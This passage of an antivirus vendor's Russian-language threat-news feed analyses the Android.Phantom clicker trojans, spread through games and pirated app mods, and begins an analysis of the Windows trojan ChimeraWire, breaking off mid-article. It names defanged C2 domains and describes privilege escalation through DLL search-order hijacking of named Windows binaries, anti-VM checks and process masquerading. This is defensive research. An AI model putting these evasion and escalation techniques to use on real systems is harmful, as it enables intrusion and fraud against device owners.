<?xml version="1.0"?>
<rss version="2.0"><channel><title>Горячая лента угроз</title><link>https://news.drweb.kz/news/</link><description>Новости компании "Доктор Веб" - Горячая лента угроз</description><image><url>https://st.drweb.com/static/drweb_logo_kk.gif</url><link>https://news.drweb.kz/news/</link><title>Антивирус Dr.Web</title></image><item><guid>https://news.drweb.kz/show/?i=15110&amp;lng=kk</guid><title>Трояны семейства Android.Phantom проникают в смартфоны вместе с играми и пиратскими модами популярных приложений. Они используют машинное обучение и видеотрансляции для накрутки кликов</title><link>https://news.drweb.kz/show/?i=15110&amp;lng=kk&amp;c=23</link><pubDate>Wed, 21 Jan 2026 05:00:00 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;21 января 2026 года&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;newslead&gt;Специалисты антивирусной лаборатории «Доктор Веб» обнаружили и исследовали новое семейство троянов с функциональностью кликера. Их объединяет одна особенность: они либо управляются с сервера &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt;, либо загружаются и выполняются по команде с него. Вредоносное ПО данного типа заражает смартфоны на ОС Android.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Один из каналов распространения троянов — официальный каталог приложений для устройств Xiaomi GetApps.&lt;/p&gt;&lt;div class="img img-two-v same-height mb-3"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Нам удалось отследить несколько мобильных игр, которые содержат вредоносное ПО: Creation Magic World (более 32 тыс. скачиваний), Cute Pet House (&amp;gt;34 тыс. скачиваний), Amazing Unicorn Party (&amp;gt;13 тыс. скачиваний), Академия мечты Сакура (&amp;gt;4 тыс. скачиваний), Theft Auto Mafia (&amp;gt;61 тыс. скачиваний), Open World Gangsters (&amp;gt;11 тыс. скачиваний). Все зараженные игры выложены от лица одного разработчика, SHENZHEN RUIREN NETWORK CO., LTD., троянцы вшиты в них и запускаются вместе с приложениями.&lt;/p&gt;&lt;p&gt;В первоначальных версиях игр вредоносного ПО не было. 28/29 сентября разработчик публикует обновления для игр, в которые встроен троян&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;. Он работает в двух режимах, которые в коде программы условно называются режим сигнализации (signaling) и фантом (phantom).&lt;/p&gt;&lt;p&gt;В режиме phantom вредоносное ПО использует скрытый от пользователя встроенный браузер на основе виджета WebView. В него по команде с сервера &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt; загружается целевой сайт для накрутки кликов и файл JavaScript «phantom». Последний содержит в себе сценарий для автоматизации действий на рекламных объявлениях загруженного сайта и фреймворк машинного обучения TensorFlowJS. Модель для этого фреймворка загружается с сервера &lt;span class="string"&gt;hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com&lt;/span&gt; в директорию приложения. В сценариях для работы с некоторыми видами рекламы&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;размещает браузер на виртуальном экране и делает скриншоты. Троян анализирует их с помощью модели для фреймворка TensorFlowJS, а затем кликает по обнаруженным элементам.&lt;/p&gt;&lt;p&gt;В альтернативном режиме signaling троянец подключается к стороннему серверу при помощи WebRTC. Эта технология позволяет браузерам и приложениям устанавливать прямое соединение для обмена данными, аудио и видео в режиме реального времени без установки дополнительного ПО. В режиме signaling уже упомянутый &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; выполняет роль сигнального сервера, устанавливающий соединения между узлами WebRTC. Также данный сервер определяет режим работы трояна, phantom или signaling. Задачи с целевыми сайтами приходят от &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;. Далее&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;тайно от пользователя транслирует злоумышленникам видео виртуального экрана с загруженным в браузер сайтом. Троянец дает возможность подключенному узлу WebRTC удаленно управлять браузером на виртуальном экране: кликать, скроллить, вводить или вставлять текст в форму для ввода.&lt;/p&gt;&lt;p&gt;15/16 октября вышеуказанные игры получили еще одно обновление. В дополнение к&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;в них встроили модуль&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. Он является дроппером, который содержит внутри себя загрузчик удаленного кода&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.4.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;. Эта программа загружает еще несколько троянов, предназначенных для имитации кликов на различных сайтах. Эти модули проще кликера&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;— они не используют машинное обучение или видеотрансляции, а руководствуются сценариями для кликов, написанных на JavaScript.&lt;/p&gt;&lt;p&gt;Чтобы использовать технологию WebRTC на Android, трояну необходимо подключить специальную библиотеку с Java API, которая не входит в состав стандартной ОС и скачанных приложений. Поэтому поначалу троян работал преимущественно в режиме phantom. С добавлением в приложения&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;, троян&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;получил возможность использовать загрузчик удаленного кода&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.4.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;для загрузки необходимой библиотеки.&lt;/p&gt;&lt;p&gt;Злоумышленники используют также и другие каналы распространения троянов&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;и&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. К примеру, моды музыкального стриминга Spotify с разблокированными premium функциями. Они размещаются на различных сайтах, вот несколько примеров:&lt;/p&gt;&lt;div class="flex justify-center gap-3"&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Сайт Spotify Plus&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Сайт Spotify Pro&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;И в специальных телеграм-каналах:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Pro&lt;/i&gt;&lt;br&gt;&lt;i&gt;(54 400 подписчиков)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Plus – Official&lt;/i&gt;&lt;br&gt;&lt;i&gt;(15 057 подписчиков)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Моды Spotify, размещенные на сайтах и в указанных на скриншотах телеграм-каналах, содержат&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;и библиотеку для организации связи по стандарту WebRTC под Android.&lt;/p&gt;&lt;p&gt;Кроме модов Spotify, злоумышленники вшивают трояны в моды других популярных приложений: YouTube, Deezer, Netflix и др. Они размещены на специальных сайтах с модами:&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Сайт Apkmody&lt;/i&gt;&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Сайт Moddroid&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Сайт Moddroid содержит раздел «Выбор редакции». Из 20 приложений в нем только 4 были чистыми. Остальные 16 содержали трояны семейства &lt;strong&gt;Android.Phantom&lt;/strong&gt;. Приложения на этих двух сайтах загружаются с одного CDN-сервера &lt;span class="string"&gt;hxxps[:]//cdn[.]topmongo[.]com&lt;/span&gt;. У этих сайтов есть свои телеграм-каналы, где пользователи скачивают зараженные троянам моды:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Moddroid.com&lt;/i&gt;&lt;br&gt;&lt;i&gt;(87 653 подписчика)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Apkmody Chat&lt;/i&gt;&lt;br&gt;&lt;i&gt;(6 297 подписчиков)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Также для своих целей преступники используют сервера Discord. Самый большой из них — Spotify X, около 24 тысяч подписчиков.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Администраторы Discord-серверов не стесняются напрямую предлагать зараженные моды. Например, на скриншоте выше администратор от лица сервера предлагает скачать мод музыкального стриминга Deezer вместо Spotify, поскольку последний перестал работать.&lt;/p&gt;&lt;p&gt;По ссылке скачивается рабочий мод. Его код защищен коммерческим упаковщиком, внутри которого скрывается троян&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;. Это загрузчик удаленного кода, по команде с сервера &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; он загружает уже нам знакомые&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;,&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&amp;nbsp;и троян-шпион &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;. Последний отправляет информацию об устройстве злоумышленникам, в том числе номер телефона, геолокацию, список установленных приложений.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Этот скриншот с сервера показывает, на каких языках говорят пользователи, которые становятся объектами заражения. Для доступа к чатам на языках, отличных от английского, необходимо поставить реакцию с соответствующим флагом. Больше всего отметились пользователи, говорящие на испанском, французском, немецком, польском и итальянском языках (не считая английского, который является основным языком сервера). Также администраторы сервера не предусмотрели чатов для многих стран Азии.&lt;/p&gt;&lt;p&gt;Трояны могут нанести существенный вред владельцам зараженных устройств. Перечислим несколько возможных исходов:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;&lt;strong&gt;Невольное соучастие.&lt;/strong&gt; Смартфон пользователя может быть использован в качестве бота при DDoS-атаке, тем самым делая владельца невольным соучастником киберпреступления.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Незаконная активность.&lt;/strong&gt; Через устройство злоумышленники могут совершать незаконную онлайн-деятельность, к примеру, использовать смартфон в мошеннических схемах или рассылать спам-сообщения.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Повышенное потребление заряда и трафика.&lt;/strong&gt; Посторонняя деятельность разряжает аккумулятор и расходует интернет-трафик.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Утечка персональных данных.&lt;/strong&gt; &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt; является шпионом и может передавать данные об устройстве и владельце.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Трояны этого семейства представляют угрозу для владельцев мобильных устройств на Android, не защищенных актуальным антивирусным ПО. Российские пользователи испытывают трудности с регистрацией в зарубежных приложениях или оплатой подписок. Ситуация подталкивает искать и использовать альтернативные, зачастую полулегальные, способы получения услуг этих компаний. Эта ситуация на руку вирусописателям, ведь пользователям приходится рисковать и доверять сомнительным вариантам. Особую группу риска составляют дети, которые не думают о правилах цифровой гигиены, желая всего лишь поиграть, послушать музыку или посмотреть видеоклипы.&lt;/p&gt;&lt;p&gt;Мы рекомендуем не скачивать моды на сомнительных сайтах и в каналах. Как правило, проверка источников модов или приложений требует времени, опыта и насмотренности. Поэтому лучший вариант обеспечить себе и своим близким гарантированное спокойствие — использовать Dr.Web Security Space для мобильных устройств. Он защитит не только ваши смартфоны, но и другие умные устройства: игровые консоли, планшеты, smartTV.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Phantom/README.adoc"&gt;Индикаторы компрометации&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.3&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.3&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.4.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15090&amp;lng=kk</guid><title>Беллерофонту такое и не снилось. Троян ChimeraWire накручивает популярность сайтов, искусно притворяясь человеком</title><link>https://news.drweb.kz/show/?i=15090&amp;lng=kk&amp;c=23</link><pubDate>Mon, 08 Dec 2025 09:44:54 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;8 декабря 2025 года&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;Введение&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;В ходе анализа одной из партнерских программ специалисты компании «Доктор Веб» обнаружили уникальное ВПО с функциональностью кликера, получившее наименование &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;. Оно работает на компьютерах под управлением ОС Windows и основано на проектах с открытым исходным кодом &lt;a href="https://github.com/sohaha/zlsgo" target="_blank"&gt;zlsgo&lt;/a&gt; и &lt;a href="https://go-rod.github.io/" target="_blank"&gt;Rod&lt;/a&gt; для автоматизированного управления веб-сайтами и веб-приложениями.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; позволяет злоумышленникам имитировать действия пользователей и накручивать поведенческий фактор веб-сайтов, искусственно поднимая их рейтинг в выдаче поисковых систем. Для этого вредоносная программа выполняет поиск нужных интернет-ресурсов в системах Google и Bing, после чего открывает их. Она также имитирует действия пользователей, самостоятельно нажимая на ссылки на загруженных сайтах. Троян совершает все вредоносные действия через браузер Google Chrome, который он скачивает с определенного ресурса и запускает в скрытом режиме отладки по протоколу WebSocket.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; попадает на компьютеры в результате работы нескольких вредоносных программ-загрузчиков. Они используют различные техники повышения привилегий на основе эксплуатации уязвимостей класса DLL Search Order Hijacking, а также антиотладочные приемы с целью избежать обнаружения. Наша антивирусная лаборатория отследила как минимум 2 цепочки заражения с их участием. В одной из них центральное место занимает вредоносный скрипт &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;, а в другой — вредоносная программа &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;, которая по принципу работы схожа с &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; и фактически выступает его альтернативой.&lt;/p&gt;

&lt;p&gt;В данном исследовании мы рассмотрим особенности &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; и вредоносных программ, которые доставляют его на устройства пользователей.&lt;/p&gt;

&lt;h3&gt;Первая цепочка заражения&lt;/h3&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_ru.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Схема, иллюстрирующая первую цепочку заражения&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Первая цепочка начинается с трояна &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54600&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;. Он проверяет, не работает ли в искусственной среде, и завершает работу, если обнаруживает признаки виртуальной машины или режима отладки. Если таких признаков нет, троян скачивает с C2-сервера ZIP-архив &lt;span class="string"&gt;python3.zip&lt;/span&gt;. В нем находится вредоносный Python-скрипт &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;, а также необходимые для его работы вспомогательные файлы — в частности, вредоносная библиотека &lt;span class="string"&gt;ISCSIEXE.dll&lt;/span&gt; (&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Starter.8377&amp;lng=kk"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;). &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54600&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt; распаковывает архив и запускает скрипт. Тот является второй ступенью заражения и представляет собой загрузчик, который скачивает с C2-сервера следующую стадию.&lt;/p&gt;

&lt;p&gt;Поведение &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; зависит от того, какими правами он обладает при запуске. Если скрипт запущен без прав администратора, он пытается их получить. Для этого извлеченный вместе с ним &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Starter.8377&amp;lng=kk"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt; копируется в каталог &lt;span class="string"&gt;%LOCALAPPDATA%\Microsoft\WindowsApps&lt;/span&gt;. Кроме того, создается скрипт &lt;span class="string"&gt;runs.vbs&lt;/span&gt;, который в дальнейшем будет использован для повторного запуска &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Далее &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; запускает системное приложение &lt;span class="string"&gt;%SystemRoot%\SysWOW64\iscsicpl.exe&lt;/span&gt;. Из-за наличия в нем уязвимости класса DLL Search Order Hijacking оно автоматически загружает троянскую библиотеку &lt;span class="string"&gt;ISCSIEXE.dll&lt;/span&gt;, имя которой совпадает с именем легитимного компонента ОС Windows.&lt;/p&gt;

&lt;p&gt;В свою очередь, &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Starter.8377&amp;lng=kk"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt; запускает VBS-скрипт &lt;span class="string"&gt;runs.vbs&lt;/span&gt;, и тот повторно исполняет &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; — уже с правами администратора.&lt;/p&gt;

&lt;p&gt;При запуске с необходимыми привилегиями &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; скачивает с C2-сервера защищенный паролем архив &lt;span class="string"&gt;onedrive.zip&lt;/span&gt;. В нем находится следующая стадия заражения — вредоносная программа &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54318&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; в виде библиотеки с именем &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt; — и необходимые для ее работы вспомогательные файлы (например, легитимное приложение &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; из ОС Windows с действительной цифровой подписью, относящееся к ПО OneDrive).&lt;/p&gt;

&lt;p&gt;После распаковки архива &lt;a href="https://vms.drweb.kz/search/?q=Python.Downloader.208&amp;lng=kk"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; создает задачу в системном планировщике на запуск программы &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; при старте системы. Далее он запускает это приложение. Из-за наличия в нем уязвимости DLL Search Order Hijacking оно автоматически загружает вредоносную библиотеку &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;, имя которой совпадает с именем компонента ПО OneDrive.&lt;/p&gt;

&lt;p&gt;Получив управление, &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54318&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; проверяет, не работает ли он в искусственной среде. При обнаружении одного из признаков работы в виртуальной машине или в режиме отладки он прекращает работу.&lt;/p&gt;

&lt;p&gt;Если такие признаки не обнаруживаются, троянская библиотека пытается скачать с C2-сервера полезную нагрузку, а также ключи шифрования для ее расшифровки.&lt;/p&gt;

&lt;p&gt;Расшифрованная полезная нагрузка представляет собой ZLIB-контейнер, внутри которого находится шеллкод и исполняемый файл. После расшифровки контейнера &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.54318&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; пытается распаковать его. Если это не удается, то троян самоудаляется, а сам процесс завершает работу. В случае успеха управление передается шеллкоду, задача которого — разжать идущий вместе с ним исполняемый файл. Данный файл является последней стадией заражения — целевым трояном &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire.2" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;Вторая цепочка заражения&lt;/h3&gt;

&lt;p&gt;Вторая цепочка начинается с вредоносной программы &lt;a href="https://vms.drweb.kz/search/?q=Trojan.DownLoader48.61444&amp;lng=kk"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;. При запуске она проверяет наличие прав администратора и при их отсутствии пытается их получить. Троян использует технику Masquerade PEB для обхода системы защиты, маскируясь под легитимный процесс &lt;span class="string"&gt;explorer.exe&lt;/span&gt;.&lt;/p&gt;

